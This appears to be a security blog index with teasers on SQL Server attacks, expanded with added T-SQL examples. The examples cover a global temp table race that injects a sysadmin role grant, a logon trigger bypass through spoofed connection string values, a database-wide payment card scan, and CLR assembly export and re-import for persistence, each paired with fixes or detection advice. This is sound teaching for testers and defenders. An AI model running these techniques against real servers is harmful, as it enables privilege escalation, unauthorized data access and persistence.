Lateral Movement in Azure App Services
We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we’re running into more instances of applications being run on Azure App Services. Whenever we run into an App Services application with a serious vulnerability, I’ll frequently get a ping asking about next steps to […]
Evil SQL Client Console: MSBuild All the Things
Evil SQL Client (ESC) is an interactive .NET SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities.
Exploiting SQL Server Global Temporary Table Race Conditions
This blog will walk through how to find and exploit SQL Server global temporary table race conditions to gain unauthorized access to data and execute code.
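Added example, not code from the original post or from NetSPI: the shape of the race the teaser describes. A procedure stages work in a global temporary table (a `##` table, visible to every session on the instance) and later acts on its contents; a second, low-privileged session polls tempdb until the table appears and inserts a row during the window. The procedure name `dbo.usp_run_reports`, the table `##report_queue`, the login `lowpriv` and the assumption that session 1 runs under a sysadmin (for example as a SQL Agent job) are all illustrative.

```sql
-- Session 1 (target; assumed pattern): stage rows in a global temp table, then
-- execute each row as dynamic SQL. Everything between CREATE TABLE and the loop
-- is the race window, and any session can write to ##report_queue during it.
CREATE PROCEDURE dbo.usp_run_reports
AS
BEGIN
    CREATE TABLE ##report_queue (id int IDENTITY(1,1), sql_text nvarchar(max));
    INSERT INTO ##report_queue (sql_text) VALUES (N'SELECT COUNT(*) FROM dbo.Orders;');

    WAITFOR DELAY '00:00:05';   -- stands in for slow work done before the rows are used

    DECLARE @sql nvarchar(max);
    DECLARE c CURSOR LOCAL FAST_FORWARD FOR SELECT sql_text FROM ##report_queue ORDER BY id;
    OPEN c;
    FETCH NEXT FROM c INTO @sql;
    WHILE @@FETCH_STATUS = 0
    BEGIN
        EXEC sp_executesql @sql;   -- runs with the caller's permissions, attacker rows included
        FETCH NEXT FROM c INTO @sql;
    END;
    CLOSE c;
    DEALLOCATE c;
    DROP TABLE ##report_queue;
END;
GO

-- Session 2 (attacker, any login that can connect): spin until the table exists,
-- read whatever was staged, and append a row before the owner consumes the queue.
DECLARE @tries int = 0;
WHILE OBJECT_ID('tempdb..##report_queue') IS NULL AND @tries < 3000
BEGIN
    WAITFOR DELAY '00:00:00.010';   -- 10 ms polling interval
    SET @tries += 1;
END;

IF OBJECT_ID('tempdb..##report_queue') IS NOT NULL
BEGIN
    SELECT * FROM ##report_queue;   -- unauthorized read of the staged data
    -- Code execution: this row is executed by session 1 with session 1's rights.
    -- The statement below only succeeds if session 1 is sysadmin (assumption above).
    INSERT INTO ##report_queue (sql_text)
    VALUES (N'ALTER SERVER ROLE sysadmin ADD MEMBER [lowpriv];');
END;
```

Global temp tables cannot be permissioned per session, so the fix is structural: use local temp tables (`#name`) or table variables for per-session work, use a permanent table with explicit GRANTs when data really must cross sessions, and never execute table contents as code. When hunting for this pattern, search module definitions for `##` (for example `SELECT OBJECT_NAME(object_id) FROM sys.sql_modules WHERE definition LIKE '%##%'`) and look at what happens to the rows afterwards.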
Bypassing SQL Server Logon Trigger Restrictions
This blog shows how to bypass SQL Server logon trigger restrictions by spoofing hostnames and application names using lesser-known connection string properties.
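Added example, not code from the original post or from NetSPI: a logon trigger of the kind the bypass targets, the connection string that defeats it, and a variant keyed on a value the client does not choose. The login `app_svc`, host `APPSRV01`, application name `InventoryApp`, server `sql01` and address `10.0.5.20` are assumptions for illustration.

```sql
-- What a logon trigger "sees" for the current session. HOST_NAME() and APP_NAME()
-- are copied from the client's connection string; client_net_address comes from
-- the network connection itself.
SELECT HOST_NAME() AS host_name,
       APP_NAME()  AS app_name,
       CONNECTIONPROPERTY('client_net_address') AS client_net_address;
GO

-- Weak trigger: both checked values are client-supplied.
CREATE TRIGGER tr_logon_weak ON ALL SERVER
FOR LOGON
AS
BEGIN
    IF ORIGINAL_LOGIN() = N'app_svc'
       AND (HOST_NAME() <> N'APPSRV01' OR APP_NAME() <> N'InventoryApp')
        ROLLBACK;   -- ROLLBACK inside a logon trigger denies the login
END;
GO

-- Bypass from any machine: set the two values in the connection string
-- (ADO.NET / ODBC keyword names; shown here as a comment, not T-SQL):
--   Server=sql01;User ID=app_svc;Password=...;Workstation ID=APPSRV01;Application Name=InventoryApp

-- Hardened trigger: ClientHost in EVENTDATA() is the client's network address
-- (reported as '<local machine>' for connections made on the server itself).
-- Install one trigger or the other, not both.
CREATE TRIGGER tr_logon_hardened ON ALL SERVER
FOR LOGON
AS
BEGIN
    DECLARE @client nvarchar(128) =
        EVENTDATA().value('(/EVENT_INSTANCE/ClientHost)[1]', 'nvarchar(128)');
    IF ORIGINAL_LOGIN() = N'app_svc'
       AND @client NOT IN (N'10.0.5.20', N'<local machine>')
        ROLLBACK;
END;
GO
```

Two cautions before deploying anything like the second trigger: a logon trigger that raises an error or rolls back too broadly blocks every new login, so test it with a second sysadmin session already open; and a network allow-list only narrows the problem (an attacker on the permitted host, or any host if the address is spoofable on that network, still gets in), so it belongs alongside least-privilege rights for `app_svc` rather than in place of them.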
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
WheresMyImplant is a mini red team toolkit that I have been developing over the past year in .NET. While developing and using it, I found that I consistently needed to alter my process access token to do such things as obtain SYSTEM permissions or add debug privileges […]
Databases and Clouds: SQL Server as a C2
This blog provides an overview of how to gain and maintain access to an environment by using SQL Server as both the command-and-control server and the agent, via a new PoC script called SQLC2.
Attacking Application Specific SQL Server Instances
This blog walks through how to use PowerUpSQL to quickly identify SQL Server instances used by third-party applications that are still configured with their default passwords.
Identifying Payment Cards at Rest – Going Beyond the Key Word Search
In this blog, I’ll be discussing an approach for locating payment card numbers stored in MSSQL databases without relying on key words for data discovery. To overcome the impracticality of pulling an entire database over the wire for advanced analysis, we’ll focus on using MSSQL’s native capability to filter out items that can’t contain cardholder […]
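Added example, not code from the original post or from NetSPI: the engine-side filtering the teaser alludes to, done with a Luhn check written in T-SQL and a scan that runs it over every string column in the current database, so only candidate columns (not whole tables) come back over the wire. The function name `dbo.fn_is_luhn_valid` is an assumption; `CREATE OR ALTER` needs SQL Server 2016 SP1 or later.

```sql
-- Luhn check in T-SQL. A value that is not 13-19 digits (after removing the
-- spaces and dashes card numbers are often stored with), or whose Luhn checksum
-- fails, cannot be a payment card number and is filtered out in the engine.
CREATE OR ALTER FUNCTION dbo.fn_is_luhn_valid (@s nvarchar(32))
RETURNS bit
AS
BEGIN
    DECLARE @d nvarchar(32) = REPLACE(REPLACE(@s, N' ', N''), N'-', N'');
    DECLARE @len int = LEN(@d);
    -- NULL must fail explicitly: otherwise the loop below is skipped and @sum = 0 passes.
    IF @d IS NULL OR @len < 13 OR @len > 19 OR @d LIKE N'%[^0-9]%' RETURN 0;

    DECLARE @i int = @len, @sum int = 0, @double bit = 0, @n int;
    WHILE @i >= 1                       -- walk right to left
    BEGIN
        SET @n = CAST(SUBSTRING(@d, @i, 1) AS int);
        IF @double = 1
        BEGIN
            SET @n = @n * 2;            -- double every second digit from the right
            IF @n > 9 SET @n = @n - 9;  -- same as summing the two digits
        END;
        SET @sum += @n;
        SET @double = 1 - @double;
        SET @i -= 1;
    END;
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO

-- Sanity check: the well-known Visa test number, and the same number with its
-- last digit changed.
SELECT dbo.fn_is_luhn_valid(N'4111 1111 1111 1111') AS visa_test_number,
       dbo.fn_is_luhn_valid(N'4111111111111112')    AS last_digit_changed;
GO

-- Discovery: for every char/varchar/nchar/nvarchar column in the database, count
-- rows that survive the cheap predicates (contains a digit, plausible length) and
-- the Luhn check. Columns with no hits are never returned.
DECLARE @sql nvarchar(max) = N'';
SELECT @sql += N' UNION ALL SELECT N''' + REPLACE(QUOTENAME(s.name) + N'.' + QUOTENAME(t.name), N'''', N'''''')
             + N''' AS tbl, N''' + REPLACE(QUOTENAME(c.name), N'''', N'''''') + N''' AS col, COUNT(*) AS hits FROM '
             + QUOTENAME(s.name) + N'.' + QUOTENAME(t.name)
             + N' WHERE ' + QUOTENAME(c.name) + N' LIKE N''%[0-9]%'''
             + N' AND LEN(' + QUOTENAME(c.name) + N') BETWEEN 13 AND 23'
             + N' AND dbo.fn_is_luhn_valid(CAST(' + QUOTENAME(c.name) + N' AS nvarchar(32))) = 1'
             + N' HAVING COUNT(*) > 0'
FROM sys.columns AS c
JOIN sys.tables  AS t  ON t.object_id = c.object_id
JOIN sys.schemas AS s  ON s.schema_id = t.schema_id
JOIN sys.types   AS ty ON ty.user_type_id = c.user_type_id
WHERE ty.name IN (N'char', N'varchar', N'nchar', N'nvarchar');

SET @sql = STUFF(@sql, 1, 11, N'');   -- drop the leading ' UNION ALL '
EXEC sp_executesql @sql;
```

Luhn is a necessary condition, not a sufficient one: plenty of other numbers (some account and serial numbers, for instance) pass it, so a hit means "look here", and narrowing further by issuer prefix and length per brand is the next filter to push into the query. The scan reads every row of every table with a string column and calls a scalar UDF per surviving row, so run it against a restored copy or off-hours, and add `TOP` to the generated statements if a table is very large.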
Attacking SQL Server CLR Assemblies
In this blog, I’ll be expanding on the CLR assembly attacks developed by Lee Christensen and covered in Nathan Kirk’s CLR blog series. I’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. I’ll also share a few new PowerUpSQL […]
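Added example, not code from the original post or from NetSPI: the enumeration, export and re-import steps in T-SQL. Editing the exported bytes to change what the assembly does happens outside the engine with .NET tooling and is not shown. The assembly name `ReportHelpers`, the target database `OtherDb` and the copy name `ReportHelpers_copy` are assumptions.

```sql
-- 1. Can CLR code run at all, and which databases would let an UNSAFE assembly load?
--    Pre-2017 semantics: UNSAFE/EXTERNAL_ACCESS load in a database that is TRUSTWORTHY
--    and owned by a sysadmin. SQL Server 2017+ adds 'clr strict security', which also
--    requires the assembly to be signed unless that option has been turned off.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'clr enabled';            -- run_value of 1 means CLR is on
EXEC sp_configure 'clr strict security';    -- errors on versions before 2017; that is informative too
SELECT d.name, d.is_trustworthy_on, SUSER_SNAME(d.owner_sid) AS owner_login
FROM sys.databases AS d;
GO

-- 2. Which user assemblies exist in this database, with what permission set, and which
--    procedures/functions call into them (the entry points worth reading or replacing)?
SELECT a.name AS assembly_name, a.permission_set_desc, a.create_date, a.modify_date,
       o.name AS entry_point, o.type_desc, m.assembly_class, m.assembly_method
FROM sys.assemblies AS a
LEFT JOIN sys.assembly_modules AS m ON m.assembly_id = a.assembly_id
LEFT JOIN sys.objects AS o ON o.object_id = m.object_id
WHERE a.is_user_defined = 1;
GO

-- 3. Export: the assembly's bytes are stored in sys.assembly_files.content.
--    CONVERT style 1 renders varbinary as a '0x...' string usable in a CREATE ASSEMBLY.
SELECT af.name AS file_name, DATALENGTH(af.content) AS bytes,
       CONVERT(varchar(max), af.content, 1) AS hex_bytes
FROM sys.assembly_files AS af
JOIN sys.assemblies AS a ON a.assembly_id = af.assembly_id
WHERE a.name = N'ReportHelpers';
GO

-- 4. Import: recreate the assembly under another name in another database from the
--    exported hex (persisting a copy outside the application's own database).
DECLARE @hex varchar(max), @sql nvarchar(max);
SELECT @hex = CONVERT(varchar(max), af.content, 1)
FROM sys.assembly_files AS af
JOIN sys.assemblies AS a ON a.assembly_id = af.assembly_id
WHERE a.name = N'ReportHelpers' AND af.file_id = 1;

SET @sql = N'CREATE ASSEMBLY ReportHelpers_copy FROM ' + @hex
         + N' WITH PERMISSION_SET = UNSAFE;';
EXEC OtherDb.sys.sp_executesql @sql;   -- runs the batch in the context of OtherDb
```

The same catalog views are the defensive checklist: an UNSAFE assembly in a TRUSTWORTHY database, a `modify_date` that does not match any deployment, or an entry point nobody recognises are the things to look for, and `sys.assembly_files.content` gives responders the exact bytes to analyse.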